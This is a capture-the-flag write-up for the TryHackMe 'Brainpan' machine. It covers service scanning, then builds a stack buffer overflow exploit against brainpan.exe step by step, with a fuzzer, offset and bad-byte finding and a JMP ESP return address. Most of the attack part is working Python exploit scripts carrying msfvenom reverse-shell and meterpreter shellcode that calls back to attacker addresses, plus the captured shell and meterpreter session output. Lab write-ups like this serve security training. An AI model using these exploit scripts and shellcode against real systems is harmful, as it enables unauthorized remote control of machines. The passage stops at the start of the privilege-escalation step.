Disclaimers
The host penetrated by this article is legally authorized. The tools and methods used in this article are limited to learning and communication. Please do not use the tools and infiltration ideas used in this article for any illegal purpose. I will not bear any responsibility for all the consequences, nor be responsible for any misuse or damage.
Service detection
┌──(root💀kali)-[~/tryhackme/Brainpan] └─# nmap -sV -Pn 10.10.248.211 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-24 22:51 EST Nmap scan report for 10.10.248.211 Host is up (0.32s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 9999/tcp open abyss? 10000/tcp open http SimpleHTTPServer 0.6 (Python 2.7.3) 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port9999-TCP:V=7.91%I=7%D=11/24%Time=619F086F%P=x86_64-pc-linux-gnu%r(N SF:ULL,298,"_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2 SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x2 SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\ SF:x20\n_\|_\|_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|\x20\x20\x20\x20_\|_\|_\ SF:|\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20 SF:\x20\x20\x20_\|_\|_\|\x20\x20_\|_\|_\|\x20\x20\n_\|\x20\x20\x20\x20_\|\ SF:x20\x20_\|_\|\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\ SF:x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\ SF:x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|\x20\x20\x20\x20_\ SF:|\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\ SF:x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\ SF:x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|_\|_\|\x20\ SF:x20\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20 SF:_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|_\|\x20\x20\x20\x20\x20\ SF:x20_\|_\|_\|\x20\x20_\|\x20\x20\x20\x20_\|\n\x20\x20\x20\x20\x20\x20\x2 SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\ SF:x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\ SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\ SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20 SF:\x20\x20_\|\n\n\[________________________\x20WELCOME\x20TO\x20BRAINPAN\ SF:x20_________________________\]\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2 SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ENTER\ SF:x20THE\x20PASSWORD\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\ SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\n SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2 SF:0\x20\x20\x20\x20\x20\x20\x20\x20>>\x20"); Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 92.55 seconds
You can see that only one http service and an unknown 9999 port service are open
Catalog blasting
┌──(root💀kali)-[~/tryhackme/Brainpan] └─# gobuster dir -w /usr/share/wordlists/Web-Content/directory-list-2.3-medium.txt -u http://10.10.248.211:10000/ =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.248.211:10000/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/Web-Content/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2021/11/24 22:55:37 Starting gobuster in directory enumeration mode =============================================================== /bin (Status: 301) [Size: 0] [--> /bin/]
There is a / bin directory. Download brainpan.exe to the local windows machine and open it. It is found that a 9999 port service is opened. It can be seen that the 9999 port service on the target runs the same program.
Buffer overflow validation
FUZZING
Because the buffer overflow needs to be tested repeatedly, we need to prepare another windows target locally. A win7 host is prepared here, the intranet IP is 192.168.3.49, and the Immunity Debugger debugging software is pre installed
Let's start fuzzing with the following fuzzy.py code
#!/usr/bin/env python3 import socket, time, sys ip = "192.168.3.49" port = 9999 timeout = 5 prefix = "OVERFLOW1 " string = prefix + "A" * 100 while True: try: with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: s.settimeout(timeout) s.connect((ip, port)) s.recv(1024) print("Fuzzing with {} bytes".format(len(string) - len(prefix))) s.send(bytes(string, "latin-1")) s.recv(1024) except: print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix))) sys.exit(0) string += 100 * "A" time.sleep(1)
It can be seen that the target program crashes when 600 bytes are sent
Calculate EIP position
At this time, we generate a non repeating byte. We select 600 bytes here and execute:
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 600
┌──(root💀kali)-[~/tryhackme/Brainpan] └─# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 600 Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9
Prepare our second script, exploit.py, and copy the bytecode generated above into the variable payload:
#coding=utf-8 #!/usr/bin/python #This is mainly to locate the memory address of the EIP import socket ip = "192.168.3.49" port = 9999 prefix = "OVERFLOW1 " offset = 0 overflow = "A" * offset retn = "" padding = "" payload = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9" postfix = "" buffer = prefix + overflow + retn + padding + payload + postfix s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((ip, port)) print("Sending evil buffer...") s.send(bytes(buffer + "\r\n", "latin-1")) print("Done!") except: print("Could not connect.")
Restart brainpan.exe program in Immunity Debugger, and then execute exploit.py above
Observe the EIP value in Immunity Debugger: 72413172
Calculate the offset of EIP and execute:
msf-pattern_offset -q 72413172
┌──(root💀kali)-[~/tryhackme/Brainpan] └─# msf-pattern_offset -q 72413172 [*] Exact match at offset 514
The obtained offset value is 514
Find bad bytes
We enter:! mona bytearray -b "\x00"
0x00 represents termination in C/C + + language, so it is a very common bad byte. We first exclude it above.
We use the following bytearray.py script to generate all bytecodes:
for x in range(1, 256): print("\\x" + "{:02x}".format(x), end='') print()
Execution:
┌──(root💀kali)-[~/tryhackme/Brainpan] └─# python3 bytearray.py \x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff
At this point, we prepare the second attack script exploit2.py and paste the bytecode generated above into the payload variable
import socket ip = "192.168.3.49" port = 9999 prefix = "OVERFLOW1 " offset = 514 overflow = "A" * offset retn = "BBBB" padding = "" payload = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" postfix = "" buffer = prefix + overflow + retn + padding + payload + postfix s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((ip, port)) print("Sending evil buffer...") s.send(bytes(buffer + "\r\n", "latin-1")) print("Done!") except: print("Could not connect.")
At the same time, we assign the offset 514 to the offset variable, assign "BBBB" to the retn variable, restart brainpan.exe and execute the above script
We can view the value of EIP, which has now become 4242. 42 in ASCII is capital B, that is, the value of retn in exploit.py above. At this time, it has been proved that EIP can be overwritten.
In addition, remember that the ESP value here is 0028F930
Let's do it! mona compare -f C:\mona\brainpan\bytearray.bin -a 0028F930
There are no bad bytes. It's a holiday.
However, it should be noted that 0x00 represents termination in C/C + + language, so it is a very common bad byte. Therefore, in this case, we can think that the only bad byte is: \ X00
Find the available ESP address
!mona jmp -r esp -cpb "\x00"
There is an available address, recording memory address: 311712F3
Note that this address needs to be written back from the back, that is: \ xf3\x12\x17\x31
Using msfvenom, we generate shellcode for the attack
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.3.67 LPORT=4444 EXITFUNC=thread -b "\x00" -f c
┌──(root💀kali)-[~/tryhackme/Brainpan] └─# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.3.67 LPORT=4444 EXITFUNC=thread -b "\x00" -f c [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload Found 11 compatible encoders Attempting to encode payload with 1 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 351 (iteration=0) x86/shikata_ga_nai chosen with final size 351 Payload size: 351 bytes Final size of c file: 1500 bytes unsigned char buf[] = "\xda\xde\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1\x52\xba\x3d\x6b\xed" "\x34\x31\x56\x17\x03\x56\x17\x83\xd3\x97\x0f\xc1\xd7\x80\x52" "\x2a\x27\x51\x33\xa2\xc2\x60\x73\xd0\x87\xd3\x43\x92\xc5\xdf" "\x28\xf6\xfd\x54\x5c\xdf\xf2\xdd\xeb\x39\x3d\xdd\x40\x79\x5c" "\x5d\x9b\xae\xbe\x5c\x54\xa3\xbf\x99\x89\x4e\xed\x72\xc5\xfd" "\x01\xf6\x93\x3d\xaa\x44\x35\x46\x4f\x1c\x34\x67\xde\x16\x6f" "\xa7\xe1\xfb\x1b\xee\xf9\x18\x21\xb8\x72\xea\xdd\x3b\x52\x22" "\x1d\x97\x9b\x8a\xec\xe9\xdc\x2d\x0f\x9c\x14\x4e\xb2\xa7\xe3" "\x2c\x68\x2d\xf7\x97\xfb\x95\xd3\x26\x2f\x43\x90\x25\x84\x07" "\xfe\x29\x1b\xcb\x75\x55\x90\xea\x59\xdf\xe2\xc8\x7d\xbb\xb1" "\x71\x24\x61\x17\x8d\x36\xca\xc8\x2b\x3d\xe7\x1d\x46\x1c\x60" "\xd1\x6b\x9e\x70\x7d\xfb\xed\x42\x22\x57\x79\xef\xab\x71\x7e" "\x10\x86\xc6\x10\xef\x29\x37\x39\x34\x7d\x67\x51\x9d\xfe\xec" "\xa1\x22\x2b\xa2\xf1\x8c\x84\x03\xa1\x6c\x75\xec\xab\x62\xaa" "\x0c\xd4\xa8\xc3\xa7\x2f\x3b\x2c\x9f\x2c\xf8\xc4\xe2\x32\xef" "\x48\x6a\xd4\x65\x61\x3a\x4f\x12\x18\x67\x1b\x83\xe5\xbd\x66" "\x83\x6e\x32\x97\x4a\x87\x3f\x8b\x3b\x67\x0a\xf1\xea\x78\xa0" "\x9d\x71\xea\x2f\x5d\xff\x17\xf8\x0a\xa8\xe6\xf1\xde\x44\x50" "\xa8\xfc\x94\x04\x93\x44\x43\xf5\x1a\x45\x06\x41\x39\x55\xde" "\x4a\x05\x01\x8e\x1c\xd3\xff\x68\xf7\x95\xa9\x22\xa4\x7f\x3d" "\xb2\x86\xbf\x3b\xbb\xc2\x49\xa3\x0a\xbb\x0f\xdc\xa3\x2b\x98" "\xa5\xd9\xcb\x67\x7c\x5a\xeb\x85\x54\x97\x84\x13\x3d\x1a\xc9" "\xa3\xe8\x59\xf4\x27\x18\x22\x03\x37\x69\x27\x4f\xff\x82\x55" "\xc0\x6a\xa4\xca\xe1\xbe";
Put the generated shellcode into our last attack script exploit3.py
import socket ip = "192.168.3.49" port = 9999 prefix = "OVERFLOW1 " offset = 514 overflow = "A" * offset retn = "\xf3\x12\x17\x31" padding = "\x90" * 16 buf = "" buf +="\xda\xde\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1\x52\xba\x3d\x6b\xed" buf +="\x34\x31\x56\x17\x03\x56\x17\x83\xd3\x97\x0f\xc1\xd7\x80\x52" buf +="\x2a\x27\x51\x33\xa2\xc2\x60\x73\xd0\x87\xd3\x43\x92\xc5\xdf" buf +="\x28\xf6\xfd\x54\x5c\xdf\xf2\xdd\xeb\x39\x3d\xdd\x40\x79\x5c" buf +="\x5d\x9b\xae\xbe\x5c\x54\xa3\xbf\x99\x89\x4e\xed\x72\xc5\xfd" buf +="\x01\xf6\x93\x3d\xaa\x44\x35\x46\x4f\x1c\x34\x67\xde\x16\x6f" buf +="\xa7\xe1\xfb\x1b\xee\xf9\x18\x21\xb8\x72\xea\xdd\x3b\x52\x22" buf +="\x1d\x97\x9b\x8a\xec\xe9\xdc\x2d\x0f\x9c\x14\x4e\xb2\xa7\xe3" buf +="\x2c\x68\x2d\xf7\x97\xfb\x95\xd3\x26\x2f\x43\x90\x25\x84\x07" buf +="\xfe\x29\x1b\xcb\x75\x55\x90\xea\x59\xdf\xe2\xc8\x7d\xbb\xb1" buf +="\x71\x24\x61\x17\x8d\x36\xca\xc8\x2b\x3d\xe7\x1d\x46\x1c\x60" buf +="\xd1\x6b\x9e\x70\x7d\xfb\xed\x42\x22\x57\x79\xef\xab\x71\x7e" buf +="\x10\x86\xc6\x10\xef\x29\x37\x39\x34\x7d\x67\x51\x9d\xfe\xec" buf +="\xa1\x22\x2b\xa2\xf1\x8c\x84\x03\xa1\x6c\x75\xec\xab\x62\xaa" buf +="\x0c\xd4\xa8\xc3\xa7\x2f\x3b\x2c\x9f\x2c\xf8\xc4\xe2\x32\xef" buf +="\x48\x6a\xd4\x65\x61\x3a\x4f\x12\x18\x67\x1b\x83\xe5\xbd\x66" buf +="\x83\x6e\x32\x97\x4a\x87\x3f\x8b\x3b\x67\x0a\xf1\xea\x78\xa0" buf +="\x9d\x71\xea\x2f\x5d\xff\x17\xf8\x0a\xa8\xe6\xf1\xde\x44\x50" buf +="\xa8\xfc\x94\x04\x93\x44\x43\xf5\x1a\x45\x06\x41\x39\x55\xde" buf +="\x4a\x05\x01\x8e\x1c\xd3\xff\x68\xf7\x95\xa9\x22\xa4\x7f\x3d" buf +="\xb2\x86\xbf\x3b\xbb\xc2\x49\xa3\x0a\xbb\x0f\xdc\xa3\x2b\x98" buf +="\xa5\xd9\xcb\x67\x7c\x5a\xeb\x85\x54\x97\x84\x13\x3d\x1a\xc9" buf +="\xa3\xe8\x59\xf4\x27\x18\x22\x03\x37\x69\x27\x4f\xff\x82\x55" buf +="\xc0\x6a\xa4\xca\xe1\xbe"; payload = buf postfix = "" buffer = prefix + overflow + retn + padding + payload + postfix s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((ip, port)) print("Sending evil buffer...") s.send(bytes(buffer + "\r\n", "latin-1")) print("Done!") except: print("Could not connect.")
Open a monitor in kali, execute the above code and receive the rebound shell of the local target
┌──(root💀kali)-[~/tryhackme/Brainpan] └─# nc -lnvp 4444 listening on [any] 4444 ... connect to [192.168.3.67] from (UNKNOWN) [192.168.3.49] 49215 Microsoft Windows [�Fen 6.1.7601] ��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ���� C:\Users\max\Desktop>whoami whoami win-mrft0tavd10\max C:\Users\max\Desktop>
So far, we have successfully verified that brainpan.exe has a buffer overflow vulnerability and given the attack code.
attack
For the convenience of subsequent penetration and right lifting, when attacking the long-range target, our payload is replaced with meterpreter
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.13.21.169 LPORT=4444 EXITFUNC=thread -b "\x00" -f c
Formal attack script:
import socket ip = "10.10.80.112" port = 9999 prefix = "OVERFLOW1 " offset = 514 overflow = "A" * offset retn = "\xf3\x12\x17\x31" padding = "\x90" * 16 buf = "" buf +="\xbd\xb2\x86\x88\xad\xdb\xd9\xd9\x74\x24\xf4\x58\x2b\xc9\xb1" buf +="\x5e\x31\x68\x15\x03\x68\x15\x83\xe8\xfc\xe2\x47\x7a\x60\x22" buf +="\xa7\x83\x71\x5d\x2e\x66\x40\x4f\x54\xe2\xf1\x5f\x1f\xa6\xf9" buf +="\x14\x4d\x53\x33\xd4\x7e\xec\x79\x0c\x0b\x60\x56\x61\xcb\x29" buf +="\x9a\xe0\xb7\x33\xcf\xc2\x86\xfb\x02\x02\xcf\x4d\x68\xeb\x9d" buf +="\x1a\x19\xa1\x31\x2e\x5f\x7a\x30\xe0\xeb\xc2\x4a\x85\x2c\xb6" buf +="\xe6\x84\x7c\x67\x7d\xce\x64\x03\xd9\xef\x95\xc0\x5c\x26\xe1" buf +="\xda\x17\x88\xf5\xa8\x93\x61\x08\x79\xea\xb5\xa7\x44\xc3\x3b" buf +="\xb9\x81\xe3\xa3\xcc\xf9\x10\x59\xd7\x39\x6b\x85\x52\xde\xcb" buf +="\x4e\xc4\x3a\xea\x83\x93\xc9\xe0\x68\xd7\x96\xe4\x6f\x34\xad" buf +="\x10\xfb\xbb\x62\x91\xbf\x9f\xa6\xfa\x64\x81\xff\xa6\xcb\xbe" buf +="\xe0\x0e\xb3\x1a\x6a\xbc\xa2\x1b\x93\x3f\xcb\x41\x04\x8c\x06" buf +="\x7a\xd4\x9a\x11\x09\xe6\x05\x8a\x85\x4a\xce\x14\x51\xda\xd8" buf +="\xa6\x8d\x64\x88\x58\x2e\x95\x81\x9e\x7a\xc5\xb9\x37\x03\x8e" buf +="\x39\xb7\xd6\x3b\x33\x2f\xd3\xb6\x56\x06\x8b\xca\x58\x49\x10" buf +="\x42\xbe\x39\xf8\x04\x6e\xfa\xa8\xe4\xde\x92\xa2\xea\x01\x82" buf +="\xcc\x20\x2a\x29\x23\x9d\x03\xc6\xda\x84\xdf\x77\x22\x13\x9a" buf +="\xb8\xa8\x96\x5b\x76\x59\xd2\x4f\x6f\x3e\x1c\x8f\x70\xab\x1c" buf +="\xe5\x74\x7d\x4a\x91\x76\x58\xbc\x3e\x88\x8f\xbe\x38\x76\x4e" buf +="\xf7\x33\x41\xc4\xb7\x2b\xae\x08\x38\xab\xf8\x42\x38\xc3\x5c" buf +="\x37\x6b\xf6\xa2\xe2\x1f\xab\x36\x0d\x76\x18\x90\x65\x74\x47" buf +="\xd6\x29\x87\xa2\x64\x2d\x77\x31\x43\x96\x10\xc9\xd3\x26\xe1" buf +="\xa3\xd3\x76\x89\x38\xfb\x79\x79\xc1\xd6\xd1\x11\x48\xb7\x90" buf +="\x80\x4d\x92\x75\x1d\x4e\x11\xae\xae\x35\x5a\x51\x4f\xca\x72" buf +="\x36\x4f\xcb\x7a\x48\x73\x1a\x43\x3e\xb2\x9f\xf0\x21\x29\x35" buf +="\x0d\xca\xf4\xdc\xac\x97\x06\x0b\xf2\xa1\x84\xb9\x8b\x55\x94" buf +="\xc8\x8e\x12\x12\x21\xe3\x0b\xf7\x45\x50\x2b\xd2"; payload = buf postfix = "" buffer = prefix + overflow + retn + padding + payload + postfix s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((ip, port)) print("Sending evil buffer...") s.send(bytes(buffer + "\r\n", "latin-1")) print("Done!") except: print("Could not connect.")
Initial shell
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) > options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf6 exploit(multi/handler) > set lhost tun0 lhost => 10.13.21.169 msf6 exploit(multi/handler) > run [*] Started reverse TCP handler on 10.13.21.169:4444 [*] Sending stage (175174 bytes) to 10.10.80.112 [*] Meterpreter session 1 opened (10.13.21.169:4444 -> 10.10.80.112:47932) at 2021-11-25 03:49:39 -0500 meterpreter > getuid Server username: brainpan\puck
Right raising
We observe the directory structure of the target machine. It looks like a linux machine, and I can't switch to the normal shell of windows in the meterpreter above
meterpreter > pwd Z:\home\puck meterpreter > cd / meterpreter > ls Listing: Z:\ ============ Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 0 dir 2013-03-04 13:02:15 -0500 bin 40777/rwxrwxrwx 0 dir 2013-03-04 11:19:23 -0500 boot 40777/rwxrwxrwx 0 dir 2021-11-25 03:46:35 -0500 etc 40777/rwxrwxrwx 0 dir 2013-03-04 11:49:37 -0500 home 100666/rw-rw-rw- 15084717 fil 2013-03-04 11:18:57 -0500 initrd.img 100666/rw-rw-rw- 15084717 fil 2013-03-04 11:18:57 -0500 initrd.img.old 40777/rwxrwxrwx 0 dir 2013-03-04 13:04:41 -0500 lib 40777/rwxrwxrwx 0 dir 2013-03-04 10:12:09 -0500 lost+found 40777/rwxrwxrwx 0 dir 2013-03-04 10:12:14 -0500 media 40777/rwxrwxrwx 0 dir 2012-10-09 10:59:43 -0400 mnt 40777/rwxrwxrwx 0 dir 2013-03-04 10:13:47 -0500 opt 40777/rwxrwxrwx 0 dir 2013-03-07 23:07:15 -0500 root 40777/rwxrwxrwx 0 dir 2021-11-25 03:46:37 -0500 run 40777/rwxrwxrwx 0 dir 2013-03-04 11:20:14 -0500 sbin 40777/rwxrwxrwx 0 dir 2012-06-11 10:43:21 -0400 selinux 40777/rwxrwxrwx 0 dir 2013-03-04 10:13:47 -0500 srv 40777/rwxrwxrwx 0 dir 2021-11-25 04:44:01 -0500 tmp 40777/rwxrwxrwx 0 dir 2013-03-04 10:13:47 -0500 usr 40777/rwxrwxrwx 0 dir 2019-08-05 16:47:05 -0400 var 100666/rw-rw-rw- 5180432 fil 2013-02-25 14:32:04 -0500 vmlinuz 100666/rw-rw-rw- 5180432 fil 2013-02-25 14:32:04 -0500 vmlinuz.old meterpreter > sysinfo Computer : brainpan OS : Windows XP (5.1 Build 2600, Service Pack 3). Architecture : x86 System Language : en_US Domain : brainpan Logged On Users : 1 Meterpreter : x86/windows
So we compiled another linux shell. It can be seen from the above that this machine is x86 architecture
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.13.21.169 LPORT=4444 EXITFUNC=thread -b "\x00" -f c
We put the payload generated above into the following attack script
